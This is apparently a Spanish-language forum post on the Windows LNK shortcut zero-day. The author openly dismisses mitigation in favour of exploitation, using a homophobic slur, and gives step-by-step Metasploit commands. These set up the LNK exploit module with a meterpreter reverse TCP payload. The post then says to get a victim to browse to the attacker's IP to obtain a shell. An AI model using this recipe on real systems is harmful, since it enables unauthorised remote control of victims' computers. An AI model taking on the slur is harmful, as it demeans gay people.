Bueno, como muchos sabran, y los que no, se enteraran ahora, hay una vulnerabilidad 0day en todas sus versiones de windows, explicada aca
La noticia no la publique porque ya la habia posteado un usuario, asique, pasados los dias, ya salio tanto su exploit, como un solucion provisoria hasta el parche oficial de MS. Y a eso viene esta entrada...
Primero a lo que nos interesa... La mitigacion? Naa, eso para maricones, la explotacion!.
Explotando "LNK" con MetaSploit
en kungfoosion.com de leo pigñer nos enseña como explotarlo con metasploit
MetaSploit nuevamente tiene un PoC para una vulnerabilidad que todavía no posee un parche de corrección de Microsoft.
Para testear esta vulnerabilidad primero debemos actualizar el framework con "svn update", y luego hacemos lo siguiente:
use windows/browser/ms10_xxx_windows_shell_lnk_execute
set SRVHOST nuestra_ip
set SRVPORT 80
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST nuestraip
set LPORT 443
exploit
despues de esto solo pedimos a la victima ke abra internet explorer y ponga nuestra_ip en la url y listo tendrèmos shell
Yo lo probé con un windows xp sp3 y funca, en vista y 7 no se xq no tengo xD
Fuente DDlr
